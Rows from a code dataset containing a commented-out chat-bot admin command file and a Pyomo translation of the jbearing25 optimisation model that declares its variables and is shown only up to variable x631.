| 3,447 | 9,759 | 0.619766 | 983 | 10,341 | 6.519837 | 0.031536 | 0.119831 | 0.249649 | 0.275238 | 0.75706 | 0.732876 | 0.692464 | 0.676081 | 0.674208 | 0.674208 | 0 | 0.57717 | 0.095252 | 10,341 | 2 | 9,760 | 5,170.5 | 0.107845 | 0 | 0 | 0 | 0 | 0 | 0.616865 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
821e28e3a641f613c665719271db84274eb79520 | 1,609 | py | Python | athus/terminar.py | londarks/Athus_V3 | fc9498c8eedd8c37302c68149f1010e16c3c0244 | [
"MIT"
] | null | null | null | athus/terminar.py | londarks/Athus_V3 | fc9498c8eedd8c37302c68149f1010e16c3c0244 | [
"MIT"
] | null | null | null | athus/terminar.py | londarks/Athus_V3 | fc9498c8eedd8c37302c68149f1010e16c3c0244 | [
"MIT"
] | null | null | null | # def block (self, message, name_sender, tripcode, id_sender):
# message = message[7:]
# for i in range(len(self.admin_list)):
# if tripcode == self.admin_list[i]:
# if 'gif' in message:
# t_gif = threading.Thread(
# target=self.social.blockGifCommand)
# t_gif.start()
# elif 'music' in message:
# t_music = threading.Thread(
# target=self.music.blockMusicCommand)
# t_music.start()
# elif 'ship' in message:
# t_ship = threading.Thread(
# target=self.social.blockShipCommand)
# t_ship.start()
# def anable (self, message, name_sender, tripcode, id_sender):
# message = message[8:]
# for i in range(len(self.admin_list)):
# if tripcode == self.admin_list[i]:
# if 'gif' in message:
# t_gif = threading.Thread(
# target=self.social.AnableGifCommand)
# t_gif.start()
# elif 'music' in message:
# t_music = threading.Thread(
# target=self.music.AnableMusicCommand)
# t_music.start()
# elif 'ship' in message:
# t_ship = threading.Thread(
# target=self.social.AnableShipCommand)
# t_ship.start()
#https://github.com/jonathanong/heroku-buildpack-ffmpeg-latest.git | 44.694444 | 70 | 0.477937 | 151 | 1,609 | 4.960265 | 0.291391 | 0.072096 | 0.080107 | 0.200267 | 0.742323 | 0.742323 | 0.742323 | 0.742323 | 0.742323 | 0.606142 | 0 | 0.002137 | 0.418272 | 1,609 | 36 | 70 | 44.694444 | 0.798077 | 0.875078 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8226a0467ffd4c41d9e6a60521de064ba5e1981e | 501,041 | py | Python | tests/examples/minlplib/jbearing25.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 2 | 2021-07-03T13:19:10.000Z | 2022-02-06T10:48:13.000Z | tests/examples/minlplib/jbearing25.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | 1 | 2021-07-04T14:52:14.000Z | 2021-07-15T10:17:11.000Z | tests/examples/minlplib/jbearing25.py | ouyang-w-19/decogo | 52546480e49776251d4d27856e18a46f40c824a1 | [
"MIT"
] | null | null | null | # NLP written by GAMS Convert at 04/21/18 13:52:25
#
# Equation counts
# Total E G L N X C B
# 1 1 0 0 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 1405 1405 0 0 0 0 0 0
# FX 154 154 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 1405 1 1404 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
# Variables x1..x293 fall into contiguous blocks: fixed variables with bounds
# (0,0) and initial value 0, and free variables with bounds (0,None) sharing a
# common initial value per block.  The per-variable declarations emitted by
# GAMS Convert are collapsed into equivalent loops; the resulting model
# components (m.x1 .. m.x293) are identical to the expanded form.
def _add_vars(first, last, ub, init):
    for i in range(first, last + 1):
        setattr(m, 'x%d' % i, Var(within=Reals, bounds=(0, ub), initialize=init))

for _first, _last, _ub, _init in [
    (1, 28, 0, 0),
    (29, 53, None, 0.122888290664714),
    (54, 55, 0, 0),
    (56, 80, None, 0.243913720108378),
    (81, 82, 0, 0),
    (83, 107, None, 0.361241666187154),
    (108, 109, 0, 0),
    (110, 134, None, 0.473093556836011),
    (135, 136, 0, 0),
    (137, 161, None, 0.577773831408252),
    (162, 163, 0, 0),
    (164, 188, None, 0.673695643646558),
    (189, 190, 0, 0),
    (191, 215, None, 0.759404916654708),
    (216, 217, 0, 0),
    (218, 242, None, 0.833602385221121),
    (243, 244, 0, 0),
    (245, 269, None, 0.895163291355063),
    (270, 271, 0, 0),
    (272, 293, None, 0.943154434471278),
]:
    _add_vars(_first, _last, _ub, _init)
m.x294 = Var(within=Reals,bounds=(0,None),initialize=0.943154434471278)
m.x295 = Var(within=Reals,bounds=(0,None),initialize=0.943154434471278)
m.x296 = Var(within=Reals,bounds=(0,None),initialize=0.943154434471278)
m.x297 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x298 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x299 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x300 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x301 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x302 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x303 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x304 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x305 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x306 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x307 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x308 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x309 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x310 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x311 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x312 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x313 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x314 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x315 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x316 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x317 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x318 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x319 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x320 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x321 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x322 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x323 = Var(within=Reals,bounds=(0,None),initialize=0.976848317759601)
m.x324 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x325 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x326 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x327 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x328 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x329 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x330 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x331 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x332 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x333 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x334 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x335 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x336 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x337 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x338 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x339 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x340 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x341 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x342 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x343 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x344 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x345 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x346 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x347 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x348 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x349 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x350 = Var(within=Reals,bounds=(0,None),initialize=0.995734176295035)
m.x351 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x352 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x353 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x354 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x355 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x356 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x357 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x358 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x359 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x360 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x361 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x362 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x363 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x364 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x365 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x366 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x367 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x368 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x369 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x370 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x371 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x372 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x373 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x374 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x375 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x376 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x377 = Var(within=Reals,bounds=(0,None),initialize=0.999525719713366)
m.x378 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x379 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x380 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x381 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x382 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x383 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x384 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x385 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x386 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x387 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x388 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x389 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x390 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x391 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x392 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x393 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x394 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x395 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x396 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x397 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x398 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x399 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x400 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x401 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x402 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x403 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x404 = Var(within=Reals,bounds=(0,None),initialize=0.988165472081259)
m.x405 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x406 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x407 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x408 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x409 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x410 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x411 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x412 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x413 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x414 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x415 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x416 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x417 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x418 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x419 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x420 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x421 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x422 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x423 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x424 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x425 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x426 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x427 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x428 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x429 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x430 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x431 = Var(within=Reals,bounds=(0,None),initialize=0.961825643172818)
m.x432 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x433 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x434 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x435 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x436 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x437 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x438 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x439 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x440 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x441 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x442 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x443 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x444 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x445 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x446 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x447 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x448 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x449 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x450 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x451 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x452 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x453 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x454 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x455 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x456 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x457 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x458 = Var(within=Reals,bounds=(0,None),initialize=0.920905517944952)
m.x459 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x460 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x461 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x462 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x463 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x464 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x465 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x466 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x467 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x468 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x469 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x470 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x471 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x472 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x473 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x474 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x475 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x476 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x477 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x478 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x479 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x480 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x481 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x482 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x483 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x484 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x485 = Var(within=Reals,bounds=(0,None),initialize=0.866025403784436)
m.x486 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x487 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x488 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x489 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x490 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x491 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x492 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x493 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x494 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x495 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x496 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x497 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x498 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x499 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x500 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x501 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x502 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x503 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x504 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x505 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x506 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x507 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x508 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x509 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x510 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x511 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x512 = Var(within=Reals,bounds=(0,None),initialize=0.798017227280237)
m.x513 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x514 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x515 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x516 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x517 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x518 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x519 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x520 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x521 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x522 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x523 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x524 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x525 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x526 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x527 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x528 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x529 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x530 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x531 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x532 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x533 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x534 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x535 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x536 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x537 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x538 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x539 = Var(within=Reals,bounds=(0,None),initialize=0.717911923064438)
m.x540 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x541 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x542 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x543 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x544 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x545 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x546 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x547 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x548 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x549 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x550 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x551 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x552 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x553 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x554 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x555 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x556 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x557 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x558 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x559 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x560 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x561 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x562 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x563 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x564 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x565 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x566 = Var(within=Reals,bounds=(0,None),initialize=0.626923805894102)
m.x567 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x568 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x569 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x570 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x571 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x572 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x573 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x574 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x575 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x576 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x577 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x578 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x579 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x580 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x581 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x582 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x583 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x584 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x585 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x586 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x587 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x588 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x589 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x590 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x591 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x592 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x593 = Var(within=Reals,bounds=(0,None),initialize=0.526432162877351)
m.x594 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x595 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x596 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x597 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x598 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x599 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x600 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x601 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x602 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x603 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x604 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x605 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x606 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x607 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x608 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x609 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x610 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x611 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x612 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x613 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x614 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x615 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x616 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x617 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x618 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x619 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x620 = Var(within=Reals,bounds=(0,None),initialize=0.417960344886778)
m.x621 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x622 = Var(within=Reals,bounds=(0,0),initialize=0)
m.x623 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x624 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x625 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x626 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x627 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x628 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x629 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x630 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
m.x631 = Var(within=Reals,bounds=(0,None),initialize=0.303152674113038)
